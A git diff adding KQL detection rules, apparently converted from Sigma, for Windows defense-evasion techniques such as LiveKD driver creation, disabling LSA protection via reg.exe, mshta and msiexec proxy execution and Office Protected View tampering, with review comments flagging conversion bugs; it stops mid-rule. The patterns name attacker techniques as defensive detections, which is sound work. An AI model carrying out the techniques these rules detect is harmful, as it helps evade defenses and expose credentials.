+++ b/KQL/rules/Defense Evasion/livekd_driver_creation.kql
@@ -0,0 +1,12 @@
+// Title: LiveKD Driver Creation
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-16
+// Level: medium
+// Description: Detects the creation of the LiveKD driver, which is used for live kernel debugging
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation
+// False Positives:
+// - Legitimate usage of LiveKD for debugging purposes will also trigger this
+
+DeviceFileEvents
+| where (InitiatingProcessFolderPath endswith "\\livekd.exe" or InitiatingProcessFolderPath endswith "\\livek64.exe") and FolderPath =~ "C:\\Windows\\System32\\drivers\\LiveKdD.SYS"
\ No newline at end of file
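Review bot: In the livekd_driver_creation hunk, `InitiatingProcessFolderPath endswith "\\livek64.exe"` looks like a typo for `\\livekd64.exe`, which is the name the kernel_memory_dump_via_livekd rule earlier in this diff uses for the 64-bit binary. Here the effect is that a driver written by livekd64.exe is not matched at all, and in livekd_driver_creation_by_uncommon_process (the next hunk) the same string sits inside the `not(...)` filter, so every legitimate run of the 64-bit tool would raise that high-severity "uncommon process" alert. Suggested change in both rules: `InitiatingProcessFolderPath endswith "\\livekd64.exe"`. The string is presumably inherited from the upstream rule, so it is worth reporting there as well rather than only patching the converted output.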
diff --git a/KQL/rules/Defense Evasion/livekd_driver_creation_by_uncommon_process.kql b/KQL/rules/Defense Evasion/livekd_driver_creation_by_uncommon_process.kql
new file mode 100644
index 00000000..b9eca040
--- /dev/null
+++ b/KQL/rules/Defense Evasion/livekd_driver_creation_by_uncommon_process.kql
@@ -0,0 +1,12 @@
+// Title: LiveKD Driver Creation By Uncommon Process
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-16
+// Level: high
+// Description: Detects the creation of the LiveKD driver by a process image other than "livekd.exe".
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation
+// False Positives:
+// - Administrators might rename LiveKD before its usage which could trigger this. Add additional names you use to the filter
+
+DeviceFileEvents
+| where FolderPath =~ "C:\\Windows\\System32\\drivers\\LiveKdD.SYS" and (not((InitiatingProcessFolderPath endswith "\\livekd.exe" or InitiatingProcessFolderPath endswith "\\livek64.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/livekd_kernel_memory_dump_file_created.kql b/KQL/rules/Defense Evasion/livekd_kernel_memory_dump_file_created.kql
new file mode 100644
index 00000000..a424efd2
--- /dev/null
+++ b/KQL/rules/Defense Evasion/livekd_kernel_memory_dump_file_created.kql
@@ -0,0 +1,12 @@
+// Title: LiveKD Kernel Memory Dump File Created
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-16
+// Level: high
+// Description: Detects the creation of a file that has the same name as the default LiveKD kernel memory dump.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation
+// False Positives:
+// - In rare occasions administrators might leverage LiveKD to perform live kernel debugging. This should not be allowed on production systems. Investigate and apply additional filters where necessary.
+
+DeviceFileEvents
+| where FolderPath =~ "C:\\Windows\\livekd.dmp"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/lol_binary_copied_from_system_directory.kql b/KQL/rules/Defense Evasion/lol_binary_copied_from_system_directory.kql
new file mode 100644
index 00000000..14e66001
--- /dev/null
+++ b/KQL/rules/Defense Evasion/lol_binary_copied_from_system_directory.kql
@@ -0,0 +1,11 @@
+// Title: LOL-Binary Copied From System Directory
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-29
+// Level: high
+// Description: Detects a suspicious copy operation that tries to copy a known LOLBIN from system (System32, SysWOW64, WinSxS) directories to another on disk in order to bypass detections based on locations.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036.003
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "copy " and FolderPath endswith "\\cmd.exe") or ((FolderPath endswith "\\robocopy.exe" or FolderPath endswith "\\xcopy.exe") or (ProcessVersionInfoOriginalFileName in~ ("robocopy.exe", "XCOPY.EXE"))) or ((ProcessCommandLine contains "copy-item" or ProcessCommandLine contains " copy " or ProcessCommandLine contains "cpi " or ProcessCommandLine contains " cp ") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe"))) and ((ProcessCommandLine contains "\\bitsadmin.exe" or ProcessCommandLine contains "\\calc.exe" or ProcessCommandLine contains "\\certutil.exe" or ProcessCommandLine contains "\\cmdl32.exe" or ProcessCommandLine contains "\\cscript.exe" or ProcessCommandLine contains "\\mshta.exe" or ProcessCommandLine contains "\\rundll32.exe" or ProcessCommandLine contains "\\wscript.exe") and (ProcessCommandLine contains "\\System32" or ProcessCommandLine contains "\\SysWOW64" or ProcessCommandLine contains "\\WinSxS"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/lolbin_runexehelper_use_as_proxy.kql b/KQL/rules/Defense Evasion/lolbin_runexehelper_use_as_proxy.kql
new file mode 100644
index 00000000..742abfac
--- /dev/null
+++ b/KQL/rules/Defense Evasion/lolbin_runexehelper_use_as_proxy.kql
@@ -0,0 +1,10 @@
+// Title: Lolbin Runexehelper Use As Proxy
+// Author: frack113
+// Date: 2022-12-29
+// Level: medium
+// Description: Detect usage of the "runexehelper.exe" binary as a proxy to launch other programs
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\runexehelper.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/lolbin_unregmp2_exe_use_as_proxy.kql b/KQL/rules/Defense Evasion/lolbin_unregmp2_exe_use_as_proxy.kql
new file mode 100644
index 00000000..0a173df7
--- /dev/null
+++ b/KQL/rules/Defense Evasion/lolbin_unregmp2_exe_use_as_proxy.kql
@@ -0,0 +1,10 @@
+// Title: Lolbin Unregmp2.exe Use As Proxy
+// Author: frack113
+// Date: 2022-12-29
+// Level: medium
+// Description: Detect usage of the "unregmp2.exe" binary as a proxy to launch a custom version of "wmpnscfg.exe"
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -HideWMP" or ProcessCommandLine contains " /HideWMP" or ProcessCommandLine contains " –HideWMP" or ProcessCommandLine contains " —HideWMP" or ProcessCommandLine contains " ―HideWMP") and (FolderPath endswith "\\unregmp2.exe" or ProcessVersionInfoOriginalFileName =~ "unregmp2.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/lsa_ppl_protection_disabled_via_reg_exe.kql b/KQL/rules/Defense Evasion/lsa_ppl_protection_disabled_via_reg_exe.kql
new file mode 100644
index 00000000..8f9f4436
--- /dev/null
+++ b/KQL/rules/Defense Evasion/lsa_ppl_protection_disabled_via_reg_exe.kql
@@ -0,0 +1,12 @@
+// Title: LSA PPL Protection Disabled Via Reg.EXE
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-03-22
+// Level: high
+// Description: Detects the usage of the "reg.exe" utility to disable PPL protection on the LSA process
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.010
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "SYSTEM\\CurrentControlSet\\Control\\Lsa" and (ProcessCommandLine contains " add " and ProcessCommandLine contains " /d 0" and ProcessCommandLine contains " /v RunAsPPL ")) and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/malicious_pe_execution_by_microsoft_visual_studio_debugger.kql b/KQL/rules/Defense Evasion/malicious_pe_execution_by_microsoft_visual_studio_debugger.kql
new file mode 100644
index 00000000..13072f91
--- /dev/null
+++ b/KQL/rules/Defense Evasion/malicious_pe_execution_by_microsoft_visual_studio_debugger.kql
@@ -0,0 +1,15 @@
+// Title: Malicious PE Execution by Microsoft Visual Studio Debugger
+// Author: Agro (@agro_sev), Ensar Şamil (@sblmsrsn), oscd.community
+// Date: 2020-10-14
+// Level: medium
+// Description: There is an option for a MS VS Just-In-Time Debugger "vsjitdebugger.exe" to launch specified executable and attach a debugger.
+This option may be used adversaries to execute malicious code by signed verified binary.
+The debugger is installed alongside with Microsoft Visual Studio package.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.t1218, attack.defense-evasion
+// False Positives:
+// - The process spawned by vsjitdebugger.exe is uncommon.
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\vsjitdebugger.exe" and (not(((FolderPath contains "\\vsimmersiveactivatehelper" and FolderPath contains ".exe") or FolderPath endswith "\\devenv.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/malicious_windows_script_components_file_execution_by_taef_detection.kql b/KQL/rules/Defense Evasion/malicious_windows_script_components_file_execution_by_taef_detection.kql
new file mode 100644
index 00000000..1c7fddea
--- /dev/null
+++ b/KQL/rules/Defense Evasion/malicious_windows_script_components_file_execution_by_taef_detection.kql
@@ -0,0 +1,14 @@
+// Title: Malicious Windows Script Components File Execution by TAEF Detection
+// Author: Agro (@agro_sev) oscd.community
+// Date: 2020-10-13
+// Level: low
+// Description: Windows Test Authoring and Execution Framework (TAEF) framework allows you to run automation by executing tests files written on different languages (C, C#, Microsoft COM Scripting interfaces
+Adversaries may execute malicious code (such as WSC file with VBScript, dll and so on) directly by running te.exe
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+// False Positives:
+// - It's not an uncommon to use te.exe directly to execute legal TAEF tests
+
+DeviceProcessEvents
+| where FolderPath endswith "\\te.exe" or InitiatingProcessFolderPath endswith "\\te.exe" or ProcessVersionInfoOriginalFileName =~ "\\te.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/mavinject_inject_dll_into_running_process.kql b/KQL/rules/Defense Evasion/mavinject_inject_dll_into_running_process.kql
new file mode 100644
index 00000000..60e245fe
--- /dev/null
+++ b/KQL/rules/Defense Evasion/mavinject_inject_dll_into_running_process.kql
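Review bot: `ProcessVersionInfoOriginalFileName =~ "\\te.exe"` in the TAEF hunk is a dead branch: the original-file-name column holds a bare file name, and every other rule in this diff compares it that way (`=~ "jsc.exe"`, `=~ "livekd.exe"`, `=~ "reg.exe"`), so an exact-equality check against a backslash-prefixed string can never be true. Change it to `ProcessVersionInfoOriginalFileName =~ "te.exe"`. The two `endswith "\\te.exe"` path checks beside it are fine as written; this looks like the converter applying the path-style prefix to a non-path field, which is worth a targeted check in the conversion script.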
@@ -0,0 +1,10 @@
+// Title: Mavinject Inject DLL Into Running Process
+// Author: frack113, Florian Roth
+// Date: 2021-07-12
+// Level: high
+// Description: Detects process injection using the signed Windows tool "Mavinject" via the "INJECTRUNNING" flag
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1055.001, attack.t1218.013
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " /INJECTRUNNING " and (not(InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\AppVClient.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/maxmpxct_registry_value_changed.kql b/KQL/rules/Defense Evasion/maxmpxct_registry_value_changed.kql
new file mode 100644
index 00000000..e8faa924
--- /dev/null
+++ b/KQL/rules/Defense Evasion/maxmpxct_registry_value_changed.kql
@@ -0,0 +1,13 @@
+// Title: MaxMpxCt Registry Value Changed
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-03-19
+// Level: low
+// Description: Detects changes to the "MaxMpxCt" registry value.
+MaxMpxCt specifies the maximum outstanding network requests for the server per client, which is used when negotiating a Server Message Block (SMB) connection with a client. Note if the value is set beyond 125 older Windows 9x clients will fail to negotiate.
+Ransomware threat actors and operators (specifically BlackCat) were seen increasing this value in order to handle a higher volume of traffic.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070.005
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\Services\\LanmanServer\\Parameters\\MaxMpxCt"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/microsoft_office_dll_sideload.kql b/KQL/rules/Defense Evasion/microsoft_office_dll_sideload.kql
new file mode 100644
index 00000000..e359d1c3
--- /dev/null
+++ b/KQL/rules/Defense Evasion/microsoft_office_dll_sideload.kql
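Review bot: In the maxmpxct_registry_value_changed hunk, `RegistryKey endswith "\\Services\\LanmanServer\\Parameters\\MaxMpxCt"` treats the value name as the last element of the key path; in DeviceRegistryEvents the key path and the value name are separate columns (the key ends at `...\\Parameters`, the value sits in RegistryValueName), so as far as I can tell this predicate never matches a change to MaxMpxCt and the rule is silently inert. Suggested: `| where RegistryKey endswith "\\Services\\LanmanServer\\Parameters" and RegistryValueName =~ "MaxMpxCt"`. The same key-versus-value-name mapping affects the `endswith "\\enabledatabasefileprotectedview"`-style checks in microsoft_office_protected_view_disabled two hunks below, so the converter's handling of upstream `TargetObject` fields is the place to fix it rather than the individual files.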
@@ -0,0 +1,12 @@
+// Title: Microsoft Office DLL Sideload
+// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)
+// Date: 2022-08-17
+// Level: high
+// Description: Detects DLL sideloading of DLLs that are part of Microsoft Office from non standard location
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001
+// False Positives:
+// - Unlikely
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\outllib.dll" and (not((FolderPath startswith "C:\\Program Files\\Microsoft Office\\OFFICE" or FolderPath startswith "C:\\Program Files (x86)\\Microsoft Office\\OFFICE" or FolderPath startswith "C:\\Program Files\\Microsoft Office\\Root\\OFFICE" or FolderPath startswith "C:\\Program Files (x86)\\Microsoft Office\\Root\\OFFICE")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/microsoft_office_protected_view_disabled.kql b/KQL/rules/Defense Evasion/microsoft_office_protected_view_disabled.kql
new file mode 100644
index 00000000..1d5faa31
--- /dev/null
+++ b/KQL/rules/Defense Evasion/microsoft_office_protected_view_disabled.kql
@@ -0,0 +1,12 @@
+// Title: Microsoft Office Protected View Disabled
+// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2021-06-08
+// Level: high
+// Description: Detects changes to Microsoft Office protected view registry keys with which the attacker disables this feature.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - Unlikely
+
+DeviceRegistryEvents
+| where (RegistryKey endswith "\\SOFTWARE\\Microsoft\\Office*" and RegistryKey endswith "\\Security\\ProtectedView*") and ((RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "\\enabledatabasefileprotectedview" or RegistryKey endswith "\\enableforeigntextfileprotectedview")) or (RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey endswith "\\DisableAttachementsInPV" or RegistryKey endswith "\\DisableInternetFilesInPV" or RegistryKey endswith "\\DisableIntranetCheck" or RegistryKey endswith "\\DisableUnsafeLocationsInPV")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/modify_group_policy_settings.kql b/KQL/rules/Defense Evasion/modify_group_policy_settings.kql
new file mode 100644
index 00000000..db6d28de
--- /dev/null
+++ b/KQL/rules/Defense Evasion/modify_group_policy_settings.kql
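Review bot: The literal `*` in `RegistryKey endswith "\\SOFTWARE\\Microsoft\\Office*"` and `RegistryKey endswith "\\Security\\ProtectedView*"` is an upstream wildcard that survived conversion; KQL `endswith` compares the characters as-is, so neither condition can match a real key path and the whole high-severity rule is dead. Replace both with `RegistryKey contains "\\SOFTWARE\\Microsoft\\Office" and RegistryKey contains "\\Security\\ProtectedView"`, and have the converter reject or translate any `*` left inside a `startswith`/`endswith`/`=~` literal. Separately, `RegistryValueData =~ "DWORD (0x00000000)"` is the Sysmon rendering of a DWORD; in DeviceRegistryEvents I believe the column carries the bare value (`"0"` / `"1"`), so that comparison should be verified against live telemetry before the rule is relied on.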
@@ -0,0 +1,12 @@
+// Title: Modify Group Policy Settings
+// Author: frack113
+// Date: 2022-08-19
+// Level: medium
+// Description: Detect malicious GPO modifications can be used to implement many other malicious behaviors.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1484.001
+// False Positives:
+// - Legitimate use
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "GroupPolicyRefreshTimeDC" or ProcessCommandLine contains "GroupPolicyRefreshTimeOffsetDC" or ProcessCommandLine contains "GroupPolicyRefreshTime" or ProcessCommandLine contains "GroupPolicyRefreshTimeOffset" or ProcessCommandLine contains "EnableSmartScreen" or ProcessCommandLine contains "ShellSmartScreenLevel") and ProcessCommandLine contains "\\SOFTWARE\\Policies\\Microsoft\\Windows\\System" and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/msdt_execution_via_answer_file.kql b/KQL/rules/Defense Evasion/msdt_execution_via_answer_file.kql
new file mode 100644
index 00000000..ee270698
--- /dev/null
+++ b/KQL/rules/Defense Evasion/msdt_execution_via_answer_file.kql
@@ -0,0 +1,13 @@
+// Title: MSDT Execution Via Answer File
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-13
+// Level: high
+// Description: Detects execution of "msdt.exe" using an answer file which is simulating the legitimate way of calling msdt via "pcwrun.exe" (For example from the compatibility tab).
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218, attack.execution
+// False Positives:
+// - Possible undocumented parents of "msdt" other than "pcwrun".
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "\\WINDOWS\\diagnostics\\index\\PCWDiagnostic.xml" and (ProcessCommandLine contains " -af " or ProcessCommandLine contains " /af " or ProcessCommandLine contains " –af " or ProcessCommandLine contains " —af " or ProcessCommandLine contains " ―af ") and FolderPath endswith "\\msdt.exe") and (not(InitiatingProcessFolderPath endswith "\\pcwrun.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/mshta_execution_with_suspicious_file_extensions.kql b/KQL/rules/Defense Evasion/mshta_execution_with_suspicious_file_extensions.kql
new file mode 100644
index 00000000..59d97807
--- /dev/null
+++ b/KQL/rules/Defense Evasion/mshta_execution_with_suspicious_file_extensions.kql
@@ -0,0 +1,16 @@
+// Title: MSHTA Execution with Suspicious File Extensions
+// Author: Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule), Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2019-02-22
+// Level: high
+// Description: Detects execution of mshta.exe with file types that looks like they do not typically represent HTA (HTML Application) content,
+such as .png, .jpg, .zip, .pdf, and others, which are often polyglots. MSHTA is a legitimate Windows utility for executing HTML Applications
+containing VBScript or JScript. Threat actors often abuse this lolbin utility to download and
+execute malicious scripts disguised as benign files or hosted under misleading extensions to evade detection.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1140, attack.t1218.005, attack.execution, attack.t1059.007, cve.2020-1599
+// False Positives:
+// - False positives depend on scripts and administrative tools used in the monitored environment
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains ".7z" or ProcessCommandLine contains ".avi" or ProcessCommandLine contains ".bat" or ProcessCommandLine contains ".bmp" or ProcessCommandLine contains ".conf" or ProcessCommandLine contains ".csv" or ProcessCommandLine contains ".dll" or ProcessCommandLine contains ".doc" or ProcessCommandLine contains ".gif" or ProcessCommandLine contains ".gz" or ProcessCommandLine contains ".ini" or ProcessCommandLine contains ".jpe" or ProcessCommandLine contains ".jpg" or ProcessCommandLine contains ".json" or ProcessCommandLine contains ".lnk" or ProcessCommandLine contains ".log" or ProcessCommandLine contains ".mkv" or ProcessCommandLine contains ".mp3" or ProcessCommandLine contains ".mp4" or ProcessCommandLine contains ".pdf" or ProcessCommandLine contains ".png" or ProcessCommandLine contains ".ppt" or ProcessCommandLine contains ".rar" or ProcessCommandLine contains ".rtf" or ProcessCommandLine contains ".svg" or 
ProcessCommandLine contains ".tar" or ProcessCommandLine contains ".tmp" or ProcessCommandLine contains ".txt" or ProcessCommandLine contains ".xls" or ProcessCommandLine contains ".xml" or ProcessCommandLine contains ".yaml" or ProcessCommandLine contains ".yml" or ProcessCommandLine contains ".zip" or ProcessCommandLine contains "vbscript") and (FolderPath endswith "\\mshta.exe" or ProcessVersionInfoOriginalFileName =~ "mshta.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/mshtml_dll_runhtmlapplication_suspicious_usage.kql b/KQL/rules/Defense Evasion/mshtml_dll_runhtmlapplication_suspicious_usage.kql
new file mode 100644
index 00000000..42e61b24
--- /dev/null
+++ b/KQL/rules/Defense Evasion/mshtml_dll_runhtmlapplication_suspicious_usage.kql
@@ -0,0 +1,13 @@
+// Title: Mshtml.DLL RunHTMLApplication Suspicious Usage
+// Author: Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems), Josh Nickels, frack113, Zaw Min Htun (ZETA)
+// Date: 2022-08-14
+// Level: high
+// Description: Detects execution of commands that leverage the "mshtml.dll" RunHTMLApplication export to run arbitrary code via different protocol handlers (vbscript, javascript, file, http...)
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "#135" or ProcessCommandLine contains "RunHTMLApplication") and (ProcessCommandLine contains "\\..\\" and ProcessCommandLine contains "mshtml")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/msiexec_quiet_installation.kql b/KQL/rules/Defense Evasion/msiexec_quiet_installation.kql
new file mode 100644
index 00000000..6e1c87d7
--- /dev/null
+++ b/KQL/rules/Defense Evasion/msiexec_quiet_installation.kql
@@ -0,0 +1,14 @@
+// Title: Msiexec Quiet Installation
+// Author: frack113
+// Date: 2022-01-16
+// Level: medium
+// Description: Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.
+Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.007
+// False Positives:
+// - WindowsApps installing updates via the quiet flag
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "-i" or ProcessCommandLine contains "/i" or ProcessCommandLine contains "–i" or ProcessCommandLine contains "—i" or ProcessCommandLine contains "―i" or ProcessCommandLine contains "-package" or ProcessCommandLine contains "/package" or ProcessCommandLine contains "–package" or ProcessCommandLine contains "—package" or ProcessCommandLine contains "―package" or ProcessCommandLine contains "-a" or ProcessCommandLine contains "/a" or ProcessCommandLine contains "–a" or ProcessCommandLine contains "—a" or ProcessCommandLine contains "―a" or ProcessCommandLine contains "-j" or ProcessCommandLine contains "/j" or ProcessCommandLine contains "–j" or ProcessCommandLine contains "—j" or ProcessCommandLine contains "―j") and (FolderPath endswith "\\msiexec.exe" or ProcessVersionInfoOriginalFileName =~ "msiexec.exe") and (ProcessCommandLine contains "-q" or ProcessCommandLine contains "/q" or ProcessCommandLine contains "–q" or ProcessCommandLine contains "—q" or ProcessCommandLine contains "―q")) and (not((((ProcessIntegrityLevel in~ ("System", "S-1-16-16384")) and InitiatingProcessFolderPath =~ "C:\\Windows\\CCM\\Ccm32BitLauncher.exe") or InitiatingProcessFolderPath startswith "C:\\Windows\\Temp\\" or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\" and InitiatingProcessFolderPath startswith "C:\\Users\\"))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/msiexec_web_install.kql b/KQL/rules/Defense Evasion/msiexec_web_install.kql
new file mode 100644
index 00000000..fc056a5b
--- /dev/null
+++ b/KQL/rules/Defense Evasion/msiexec_web_install.kql
@@ -0,0 +1,12 @@
+// Title: MsiExec Web Install
+// Author: Florian Roth (Nextron Systems)
+// Date: 2018-02-09
+// Level: medium
+// Description: Detects suspicious msiexec process starts with web addresses as parameter
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.007, attack.command-and-control, attack.t1105
+// False Positives:
+// - False positives depend on scripts and administrative tools used in the monitored environment
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " msiexec" and ProcessCommandLine contains "://"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/msxsl_exe_execution.kql b/KQL/rules/Defense Evasion/msxsl_exe_execution.kql
new file mode 100644
index 00000000..7c3f9335
--- /dev/null
+++ b/KQL/rules/Defense Evasion/msxsl_exe_execution.kql
@@ -0,0 +1,14 @@
+// Title: Msxsl.EXE Execution
+// Author: Timur Zinniatullin, oscd.community
+// Date: 2019-10-21
+// Level: medium
+// Description: Detects the execution of the MSXSL utility. This can be used to execute Extensible Stylesheet Language (XSL) files. These files are commonly used to describe the processing and rendering of data within XML files.
+Adversaries can abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1220
+// False Positives:
+// - Msxsl is not installed by default and is deprecated, so unlikely on most systems.
+
+DeviceProcessEvents
+| where FolderPath endswith "\\msxsl.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/netsh_allow_group_policy_on_microsoft_defender_firewall.kql b/KQL/rules/Defense Evasion/netsh_allow_group_policy_on_microsoft_defender_firewall.kql
new file mode 100644
index 00000000..f069d3ac
--- /dev/null
+++ b/KQL/rules/Defense Evasion/netsh_allow_group_policy_on_microsoft_defender_firewall.kql
@@ -0,0 +1,12 @@
+// Title: Netsh Allow Group Policy on Microsoft Defender Firewall
+// Author: frack113
+// Date: 2022-01-09
+// Level: medium
+// Description: Adversaries may modify system firewalls in order to bypass controls limiting network usage
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.004
+// False Positives:
+// - Legitimate administration activity
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "advfirewall" and ProcessCommandLine contains "firewall" and ProcessCommandLine contains "set" and ProcessCommandLine contains "rule" and ProcessCommandLine contains "group=" and ProcessCommandLine contains "new" and ProcessCommandLine contains "enable=Yes") and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/network_connection_initiated_by_addinutil_exe.kql b/KQL/rules/Defense Evasion/network_connection_initiated_by_addinutil_exe.kql
new file mode 100644
index 00000000..47eb9926
--- /dev/null
+++ b/KQL/rules/Defense Evasion/network_connection_initiated_by_addinutil_exe.kql
@@ -0,0 +1,12 @@
+// Title: Network Connection Initiated By AddinUtil.EXE
+// Author: Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri)
+// Date: 2023-09-18
+// Level: high
+// Description: Detects a network connection initiated by the Add-In deployment cache updating utility "AddInutil.exe".
+This could indicate a potential command and control communication as this tool doesn't usually initiate network activity.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceNetworkEvents
+| where InitiatingProcessFolderPath endswith "\\addinutil.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/new_capture_session_launched_via_dxcap_exe.kql b/KQL/rules/Defense Evasion/new_capture_session_launched_via_dxcap_exe.kql
new file mode 100644
index 00000000..6e7e7e76
--- /dev/null
+++ b/KQL/rules/Defense Evasion/new_capture_session_launched_via_dxcap_exe.kql
@@ -0,0 +1,13 @@
+// Title: New Capture Session Launched Via DXCap.EXE
+// Author: Beyu Denis, oscd.community, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2019-10-26
+// Level: medium
+// Description: Detects the execution of "DXCap.EXE" with the "-c" flag, which allows a user to launch any arbitrary binary or windows package through DXCap itself. This can be abused to potentially bypass application whitelisting.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+// False Positives:
+// - Legitimate execution of dxcap.exe by legitimate user
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " -c " and (FolderPath endswith "\\DXCap.exe" or ProcessVersionInfoOriginalFileName =~ "DXCap.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/new_dll_registered_via_odbcconf_exe.kql b/KQL/rules/Defense Evasion/new_dll_registered_via_odbcconf_exe.kql
new file mode 100644
index 00000000..ace0035c
--- /dev/null
+++ b/KQL/rules/Defense Evasion/new_dll_registered_via_odbcconf_exe.kql
@@ -0,0 +1,12 @@
+// Title: New DLL Registered Via Odbcconf.EXE
+// Author: Kirill Kiryanov, Beyu Denis, Daniil Yugoslavskiy, oscd.community, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-22
+// Level: medium
+// Description: Detects execution of "odbcconf" with "REGSVR" in order to register a new DLL (equivalent to running regsvr32). Attackers abuse this to install and run malicious DLLs.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.008
+// False Positives:
+// - Legitimate DLLs being registered via "odbcconf" will generate false positives. Investigate the path of the DLL and its content to determine if the action is authorized.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "REGSVR " and ProcessCommandLine contains ".dll") and (FolderPath endswith "\\odbcconf.exe" or ProcessVersionInfoOriginalFileName =~ "odbcconf.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/new_file_association_using_exefile.kql b/KQL/rules/Defense Evasion/new_file_association_using_exefile.kql
new file mode 100644
index 00000000..7c94cc0e
--- /dev/null
+++ b/KQL/rules/Defense Evasion/new_file_association_using_exefile.kql
@@ -0,0 +1,10 @@
+// Title: New File Association Using Exefile
+// Author: Andreas Hunkeler (@Karneades)
+// Date: 2021-11-19
+// Level: high
